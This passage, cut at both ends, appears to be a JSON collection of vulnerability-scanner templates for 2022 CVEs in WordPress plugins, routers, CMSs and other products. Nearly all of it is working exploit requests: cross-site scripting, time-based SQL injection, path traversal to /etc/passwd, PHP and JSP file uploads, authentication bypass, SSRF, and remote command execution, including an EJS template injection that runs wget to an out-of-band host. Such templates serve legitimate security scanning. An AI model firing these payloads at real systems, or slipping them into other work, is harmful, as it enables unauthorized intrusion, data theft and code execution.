Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?toast=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["text: \"</script><script>alert(document.cookie);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26564","info":{"name":"HotelDruid Hotel Management Software 3.0.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/creaprezzi.php?prezzoperiodo4=%22><script>javascript:alert(%27XSS%27)</script>","{{BaseURL}}/modifica_cliente.php?tipo_tabella=%22><script>javascript:alert(%27XSS%27)</script>&idclienti=1","{{BaseURL}}/dati/availability_tpl.php?num_app_tipo_richiesti1=%22><script>javascript:alert(%27XSS%27)</script>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>javascript:alert('XSS')</script>","HotelDruid"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1946","info":{"name":"WordPress Gallery <2.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=wpda_gall_load_image_info&start=0&limit=1&gallery_current_index=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["wpdevar_gall_img_url_h[<script>alert(document.domain)</script>]"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25149","info":{"name":"WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 50s\nGET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip='-sleep(6)-'&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home&current_page_id=0&search_query&page_uri=/&user_id=0 HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"application/json\")","contains(body, 'Visitor Hit was recorded successfully')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["_wpnonce=([0-9a-zA-Z]+)"],"internal":true}]}]},{"id":"CVE-2022-0437","info":{"name":"karma-runner DOM-based Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/karma.js","{{BaseURL}}/?return_url=javascript:alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 6.3.14')"]},{"type":"word","part":"body_2","words":["Karma"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)VERSION: '([0-9.]+)'"],"internal":true}]}]},{"id":"CVE-2022-0599","info":{"name":"WordPress Mapping Multiple URLs Redirect Same Page <=5.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=mmursp-list&view=edit&mmursp_id=\"><svg/onload=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")"],"condition":"and"},{"type":"word","part":"body","words":["id=\"mmursp_id\" value=\"\\\"><svg/onload=alert(document.domain)>\" />"]}]}]},{"id":"CVE-2022-3934","info":{"name":"WordPress FlatPM <3.0.13 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nGET /wp-admin/admin.php?page=blocks_form&block_cat_ID=1%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\") && contains(body_2, \"Flat PM\")"],"condition":"and"}]}]},{"id":"CVE-2022-30776","info":{"name":"Atmail 6.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/atmail/index.php/admin/index/?error=1%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Error: 1<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3869","info":{"name":"Froxlor < 0.10.38.2. - HTML Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?showmessage=4&customermail=\"><h2>TEST</h2>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["The message to \"\"><h2>TEST</h2>\" failed"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0432","info":{"name":"Mastodon Prototype Pollution Vulnerability","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/embed.js"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["if (data.type !== 'setHeight' || !iframes[data.id]) {"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32018","info":{"name":"Complete Online Job Search System 1.0 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?q=hiring&search=URC%27%20union%20select%201,2,3,4,5,6,7,8,9,md5({{num}}),11,12,13,14,15,16,17,18,19--+"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-42748","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting.","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-24223","info":{"name":"Atom CMS v2.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nemail={{randstr}}@gmail.com'+AND+(SELECT+2549+FROM+(SELECT(SLEEP(6)))LIzI)+AND+'uqzM'='uqzM&password={{randstr}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Admin Login\") && contains(body, \"Atom.SaveOnBlur\")"],"condition":"and"}]}]},{"id":"CVE-2022-26352","info":{"name":"DotCMS - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /api/content/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------aadc326f7ae3eac3\n\n--------------------------aadc326f7ae3eac3\nContent-Disposition: form-data; name=\"name\"; filename=\"../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/{{randstr}}.jsp\"\nContent-Type: text/plain\n\n<%\nout.println(\"CVE-2022-26352\");\n%>\n--------------------------aadc326f7ae3eac3--\n","GET /{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"CVE-2022-26352\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-24384","info":{"name":"SmarterTools SmarterTrack - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /Main/Default.aspx?viewSurveyError=Unknown+survey\"><img%20src=x%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n\n"],"matchers":[{"type":"word","words":["\"type\":\"error\",\"text\":\"Unknown survey\\\"><img src=x onerror=alert(document.domain)>\"","smartertrack"],"condition":"and"}]}]},{"id":"CVE-2022-0189","info":{"name":"WordPress RSS Aggregator < 4.20 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nid=%3Chtml%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(`document.domain`)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2544","info":{"name":"WordPress Ninja Job Board < 1.3.3 - Direct Request","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp/wp-content/uploads/wpjobboard/","{{BaseURL}}/wp-content/uploads/wpjobboard/"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Index of /wp/wp-content/uploads/wpjobboard","Index of /wp-content/uploads/wpjobboard"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0666","info":{"name":"Microweber < 1.2.11 - CRLF Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/logout?redirect_to=%0d%0aSet-Cookie:crlfinjection=1;"],"matchers":[{"type":"regex","part":"header","regex":["^Set-Cookie: crlfinjection=1;"]}]}]},{"id":"CVE-2022-1390","info":{"name":"WordPress Admin Word Count Column 2.2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\\0"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25481","info":{"name":"ThinkPHP 5.0.24 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?s=example"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Exception","REQUEST_TIME","ThinkPHP Constants"],"condition":"and"},{"type":"status","status":[200,500,404],"condition":"or"}]}]},{"id":"CVE-2022-0533","info":{"name":"Ditty (formerly Ditty News Ticker) < 3.0.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=ditty&page=ditty_settings&tab=%22%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains_all(body_2, \"<img src onerror=alert(document.domain)>\", \"ditty\")"],"condition":"and"}]}]},{"id":"CVE-2022-2546","info":{"name":"WordPress All-in-One WP Migration <=7.62 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=ai1wm_export HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bnew_value%5D%5B%5D=XSSPAYLOAD%3Csvg+onload=alert(document.domain)%3E&ai1wm_manual_export=1&secret_key={{secretkey}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_3, '{\\\"new_value\\\":[\\\"XSSPAYLOAD<svg onload=alert(document.domain)>')"],"condition":"and"}],"extractors":[{"type":"regex","name":"secretkey","group":1,"regex":["ai1wm_feedback\"},\"secret_key\":\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2022-23347","info":{"name":"BigAnt Server v5.6.06 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&file_name=win.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0963","info":{"name":"Microweber <1.2.12 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /plupload HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------59866212126262636974202255034\nReferer: {{BaseURL}}admin/view:modules/load_module:files\n\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"name\"\n\n{{randstr}}.xml\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"chunk\"\n\n0\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"chunks\"\n\n1\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"file\"; filename=\"blob\"\nContent-Type: application/octet-stream\n\n<x:script xmlns:x=\"http://www.w3.org/1999/xhtml\">alert(document.domain)</x:script>\n-----------------------------59866212126262636974202255034--\n","GET /userfiles/media/default/{{to_lower(\"{{randstr}}\")}}.xml HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_3,\"alert(document.domain)\")","status_code_3==200","contains(body_2,\"bytes_uploaded\")"],"condition":"and"}]}]},{"id":"CVE-2022-4301","info":{"name":"WordPress Sunshine Photo Cart <2.9.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-login.php?action=register&redirect_to=x%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Registration Form"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0827","info":{"name":"WordPress Best Books <=2.6.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=bestbooks_add_transaction&type=x&account=x&date=x&description=1&debit=(CASE WHEN (9277=9277) THEN SLEEP(6) ELSE 9277 END)&credit=1\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code == 200","contains(body, \"Account added successfully\")"],"condition":"and"}]}]},{"id":"CVE-2022-26159","info":{"name":"Ametys CMS Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/web/service/search/auto-completion/domain/en.xml?q=adm"],"matchers-condition":"and","matchers":[{"type":"word","words":["<auto-completion>","<item>"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1713","info":{"name":"Drawio <18.0.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /proxy?url=http%3a//0:8080/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Flowchart Maker & Online Diagram Software</title>"]},{"type":"word","part":"header","words":["application/octet-stream"]}]}]},{"id":"CVE-2022-32094","info":{"name":"Hospital Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /hms/doctor/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Doctor  | Dashboard</title>","View Appointment History"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42749","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"],"condition":"and"},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-2627","info":{"name":"WordPress Newspaper < 12 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=11.2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=td_ajax_loop&loopState[moduleId]={{xss_payload}}&loopState[server_reply_html_data]=\n"],"payloads":{"xss_payload":["--><form><math><img+onerror=alert(document.domain)+src=1><mtext></form>"]},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<form><math><img onerror=alert(document.domain) src=1><mtext>","td-block-"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4328","info":{"name":"WooCommerce Checkout Field Manager < 18.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name={{randstr}}.pHp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------22728be7b3104597\n\n--------------------------22728be7b3104597\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n--------------------------22728be7b3104597--\n","GET /wp-content/uploads/cfom_files/{{to_lower('{{randstr}}')}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{md5(string)}}"]}]}]},{"id":"CVE-2022-0540","info":{"name":"Atlassian Jira Seraph - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/InsightPluginShowGeneralConfiguration.jspa;","{{BaseURL}}/secure/WBSGanttManageScheduleJobAction.jspa;"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["General Insight Configuration"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29013","info":{"name":"Razer Sila Gaming Router - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/ubus/"],"headers":{"Origin":"{{RootURL}}","Referer":"{{ROotURL}}","X-Requested-With":"XMLHttpRequest"},"body":"{\"jsonrpc\":\"2.0\",\"id\":3,\"method\":\"call\",\"params\":[\"30ebdc7dd1f519beb4b2175e9dd8463e\",\"file\",\"exec\",{\"command\":\"id\"}]}\n","matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34048","info":{"name":"Wavlink WN-533A8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\n\nnewUI=1&page=login&username=admin&langChange=0&ipaddr=196.219.234.10&login_page=x\");alert(9);x=(\"&homepage=main.html&sysinitpage=sysinit.shtml&wizardpage=wiz.shtml&hostname=0.0.0.1&key=M94947765&password=ab4e98e4640b6c1ee88574ec0f13f908&lang_select=en\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["x\");alert(9);x=(\"?login=0\");</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29078","info":{"name":"Node.js Embedded JavaScript 3.1.6 - Template Injection","severity":"critical"},"requests":[{"raw":["GET /page?id={{randstr}}&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27);s HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["You are viewing page number"]}]}]},{"id":"CVE-2022-40032","info":{"name":"Simple Task Managing System v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /task/loginValidation.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin=test'%20AND%20(SELECT%208979%20FROM%20(SELECT(SLEEP(7-(IF(ORD(MID((SELECT%20DISTINCT(IFNULL(CAST(schema_name%20AS%20NCHAR)%2c0x20))%20FROM%20INFORMATION_SCHEMA.SCHEMATA%20LIMIT%200%2c1)%2c12%2c1))%3e48%2c0%2c1)))))jaXJ)--%20HgKq&password=\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 302","contains(location, 'login.php')","contains(content_type, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2022-41412","info":{"name":"perfSONAR 4.x <= 4.4.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34576","info":{"name":"WAVLINK WN535 G3 - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportAllSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","words":["Login=","Password=","Model=","AuthMode="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1057","info":{"name":"WordPress Pricing Deals for WooCommerce <=2.0.2.02 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(6),3--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"been a critical error\")"],"condition":"and"}]}]},{"id":"CVE-2022-26833","info":{"name":"Open Automation Software OAS Platform V16.00.0121 - Missing Authentication","severity":"critical"},"requests":[{"raw":["POST /OASREST/v2/authenticate HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nConnection: keep-alive\nContent-Type: application/json\n\n{\"username\": \"\", \"password\": \"\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"status\":","\"data\":","\"token\":","\"clientid\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45365","info":{"name":"Stock Ticker <= 3.23.2 - Cross-Site-Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stockticker_symbol_search_test&symbol=test&endpoint=%3Cimg+src%3Dx+onerror%3D%26%23x61%3B%26%23x6c%3B%26%23x65%3B%26%23x72%3B%26%23x74%3B%28document.domain%29%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Stock Ticker Fatal","<IMG SRC=X ONERROR="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31847","info":{"name":"WAVLINK WN579 X3 M79X3.V5030.180719 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportAllSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","words":["Login=","Password=","Model=","AuthMode="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31854","info":{"name":"Codoforum 5.1 - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /admin/?page=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryACGPpj7UIqmtLNbB\n\n------WebKitFormBoundaryACGPpj7UIqmtLNbB\nContent-Disposition: form-data; name=\"username\"\n\n{{username}}\n------WebKitFormBoundaryACGPpj7UIqmtLNbB\nContent-Disposition: form-data; name=\"password\"\n\n{{password}}\n------WebKitFormBoundaryACGPpj7UIqmtLNbB--\n","GET /admin/index.php?page=config HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/index.php?page=config HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryoLtdjuqj2ixPvBhA\n\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA\nContent-Disposition: form-data; name=\"site_title\"\n\n\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA\nContent-Disposition: form-data; name=\"forum_logo\"; filename=\"{{randstr}}.php\"\nContent-Type:  application/x-httpd-php\n\n<?php\n\necho md5('CVE-2022-31854');\n\n?>\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA\nContent-Disposition: form-data; name=\"CSRF_token\"\n\n{{csrf}}\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA--\n","GET /sites/default/assets/img/attachments/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_4 == 200","contains(content_type_4, \"text/html\")","contains(body_4, \"a63fd49130de6406a66600cd8caa162f\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"CSRF_token\" value=\"([0-9a-zA-Z]+)\"/>"],"internal":true}]}]},{"id":"CVE-2022-38322","info":{"name":"Temenos Transact - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsps/helprequest.jsp?url=%27)%22+onerror=%22confirm(%27document.domain%27)%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["setupHelp('')\" onerror=\"confirm('document.domain')"]},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22963","info":{"name":"Spring Cloud - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /functionRouter HTTP/1.1\nHost: {{Hostname}}\nspring.cloud.function.routing-expression: T(java.net.InetAddress).getByName(\"{{interactsh-url}}\")\nContent-Type: application/x-www-form-urlencoded\n\n{{rand_base(8)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http","dns"],"condition":"or"},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-47615","info":{"name":"LearnPress Plugin < 4.2.0 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["GET /wp-json/lp/v1/courses/archive-course?template_path=..%2F..%2F..%2Fetc%2Fpasswd&return_type=html HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"body","words":["\"status\":","\"pagination\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1815","info":{"name":"Drawio <18.1.2 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /service/0/test.oast.me HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, 'Interactsh Server')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2022-23808","info":{"name":"phpMyAdmin < 5.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/phpmyadmin/setup/index.php?page=servers&mode=test&id=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/setup/index.php?page=servers&mode=test&id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>","<h2>Add a new server</h2>","<title>phpMyAdmin setup"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45362","info":{"name":"WordPress Paytm Payment Gateway <=2.7.0 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /?paytm_action=curltest&url={{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["paytm-payments.css"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2599","info":{"name":"WordPress Anti-Malware Security and Brute-Force Firewall <4.21.83 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET 